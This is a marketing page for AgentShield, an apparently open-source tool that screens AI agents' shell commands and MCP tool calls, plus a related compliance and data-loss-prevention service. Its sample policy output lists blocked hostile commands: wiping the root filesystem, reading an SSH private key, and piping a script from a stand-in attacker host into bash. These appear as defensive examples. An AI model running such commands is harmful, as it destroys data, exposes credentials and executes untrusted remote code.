Open Source SOC 2 ISO 42001 MITRE ATLAS DLP

Runtime Security for AI Agents.
Compliance for the Enterprise.

AgentShield monitors every command your AI agents execute. AI Agent Lens gives your organization compliance governance, audit trails, and enforcement — across every developer's machine.

View on GitHub Start Free
Download for macOS (Apple Silicon)
macOS 12+ · Apple Silicon (M1/M2/M3/M4) · ~7 MB
or install via Homebrew (recommended):
$ brew tap AI-AgentLens/tap && brew install --cask agentshield
$ brew tap AI-AgentLens/tap && brew install --cask agentshield
Installs prebuilt AgentShield binaries (macOS & Linux)
Then run:
$ agentshield setup
Download for Linux (x86_64)
Linux x86_64 / ARM64 · No dependencies
or via script:
$ curl -fsSL https://release.aiagentlens.com/releases/latest/agentshield_latest_linux_amd64.tar.gz | tar xz && sudo mv agentshield /usr/local/bin/
$ agentshield scan
─── Shell Command Policy ───
  Destructive rm           rm -rf / BLOCK
  SSH key access          cat ~/.ssh/id_rsa BLOCK
  Pipe to shell           curl evil.com/x.sh | bash BLOCK
  Safe read-only          ls -la ALLOW
  Shell: 5/5 passed
─── MCP Tool Call Policy ───
  Block execute_command   execute_command BLOCK
  Block SSH read          read_file BLOCK
  Allow safe tool         get_weather AUDIT
  MCP: 5/5 passed
All 16 tests passed — AgentShield is working correctly
Products

Three products. One security platform.

Open-source runtime protection on every machine. Data loss prevention for AI agents. Enterprise compliance governance in the cloud.

AgentShield Open Source

Install on any developer machine via Homebrew. 7-layer analysis pipeline evaluates every shell command and MCP tool call before execution. Works standalone with your own rules, or connects to AI Agent Lens for managed compliance.

AI Agent Lens SaaS

Organization-wide compliance governance. Admins create orgs, invite members, enable compliance frameworks, push rules to all agents, and get real-time audit trails with rich reports. SOC 2, OWASP LLM, ISO 27001, ISO 42001, MITRE ATLAS, EU AI Act.

Data Protection New

Customer-defined data labels detect and block sensitive data — PII, project codenames, internal IDs — before it reaches AI tools or MCP servers. Regex, keyword matching, and Luhn validators with zero overhead when disabled.

Compliance Rules Engine

107 controls across 6 compliance frameworks. Choose AUDIT (observe), BLOCK (enforce), or ALLOW per control. Free tier gets audit-only visibility. Paid tiers unlock enforcement, custom rules, and exportable reports.

How It Works

From install to enforced in 5 minutes

Install AgentShield

brew install agentshield
One command, every platform.

Connect to your org

agentshield login
Device auth flow links to your AI Agent Lens org.

Rules push automatically

Admins enable SOC 2, OWASP, or ISO 42001. Rules sync to every agent in the org.

Monitor & enforce

Every command audited. Violations blocked. Reports generated. Compliance proven.

For Organizations

Hundreds of developers.
One compliance policy.

Sign up your org. Invite your team. Every AgentShield installation syncs the same compliance rules. Every command decision flows back to a central audit trail. Real-time dashboards show who's online, what's blocked, and your compliance posture.

Org management Member invites Role-based access Central audit log Agent fleet monitoring Compliance reports
GET /api/dashboard
{
"org": { "Acme Corp", "team" },
"agents": { 47 online, 3 offline },
"compliance": {
"SOC 2": 100%,
"OWASP LLM": 100%,
"ISO 42001": 89%
},
"audit_24h": {
"BLOCK": 23, "AUDIT": 1,247, "ALLOW": 8,914
}
}
Data Protection

Stop sensitive data before it reaches AI.

Define custom data labels — PII, project codenames, internal identifiers — and AgentShield blocks them from leaking through shell commands or MCP tool calls. Zero overhead when disabled.

Regex + Context

Define patterns like SSN (XXX-XX-XXXX) with optional context keywords to eliminate false positives. Pre-compiled at startup for maximum throughput.

Keyword Detection

Block internal project codenames, customer IDs, or any sensitive terms. Aho-Corasick automaton scans all keywords in a single pass — microseconds, not milliseconds.

Validators

Luhn checksum for credit cards, extensible to any post-match validation. Eliminates false positives from random digit sequences that match regex patterns.

MCP + Shell

Scans both shell commands (pipeline Layer 7) and MCP tool call arguments before they reach downstream servers. Scope labels to specific tools or directions.

# policy.yaml
data_labels:
- id: "pii-ssn"
decision: "BLOCK"
patterns:
- regex: '\b\d{3}-\d{2}-\d{4}\b'
context: "ssn|social.security"
Compliance

6 frameworks. 500+ threat entries. One click.

Enable compliance frameworks in the dashboard. Rules automatically push to every AgentShield installation in your org. Generate audit-ready reports for your compliance team.

OWASP LLM Top 10

10 controls — prompt injection, data disclosure

MITRE ATLAS

40 controls — adversarial AI techniques, full threat matrix

ISO 42001:2023

20 controls — AI governance, data quality, lifecycle

EU AI Act 2024

8 controls — risk management, human oversight, transparency

ISO 27001:2022

17 controls — access, SDLC, data leakage prevention

SOC 2 Type II

12 controls — access, credentials, monitoring

Pricing

Start free. Enforce when ready.

Free tier gives full audit visibility. Upgrade when you need enforcement, more frameworks, and compliance reports.

Free
$0 /month
Audit visibility for small teams
  • Up to 5 members
  • Up to 5 agents
  • OWASP LLM Top 10
  • Audit-only mode (observe)
  • 7-day log retention
  • API access
  • No enforcement
  • No custom rules
  • No compliance reports
Get Started
Team
$29 /user/month
Enforcement for growing teams
  • Up to 50 members
  • Up to 100 agents
  • SOC 2 + ISO 27001 + OWASP + ISO 42001
  • Full enforcement (BLOCK/ALLOW)
  • 90-day log retention
  • Custom rules
  • Compliance reports (MD/CSV)
  • API access
  • No priority support
Start Team Plan
Enterprise
Custom
Full compliance suite for regulated orgs
  • Unlimited members
  • Unlimited agents
  • All 6 frameworks (incl. MITRE ATLAS, EU AI Act)
  • Full enforcement
  • Custom data labels (PII/DLP)
  • 1-year log retention
  • Custom rules
  • Compliance reports
  • API access
  • Priority support
Contact Sales
Open Source

AgentShield is free.
Forever.

The runtime security engine is open source under Apache 2.0. Install it standalone with your own YAML rules — no SaaS required. The 7-layer analyzer pipeline, policy packs, data labels, and IDE integrations are all community-driven.

View on GitHub Policy Guide
7-Layer Pipeline
Regex → Structural → Semantic → Dataflow → Stateful → Guardian → Data Labels
3,700+ Test Cases
99.8% recall across 9 threat kingdoms
MCP Mediation
stdio + HTTP proxy — tool poisoning detection, content scanning
Data Labels (DLP)
Custom PII detection — regex, Aho-Corasick keywords, Luhn validators
IDE Hooks
Claude Code, Cursor, Windsurf, OpenClaw — native integration
Get Started

Secure your AI agents today.

Install AgentShield in 30 seconds. Sign up for AI Agent Lens to manage compliance across your organization.

Download for macOS GitHub Repo Contact Us
$ brew tap AI-AgentLens/tap && brew install --cask agentshield
Also available via Homebrew · macOS & Linux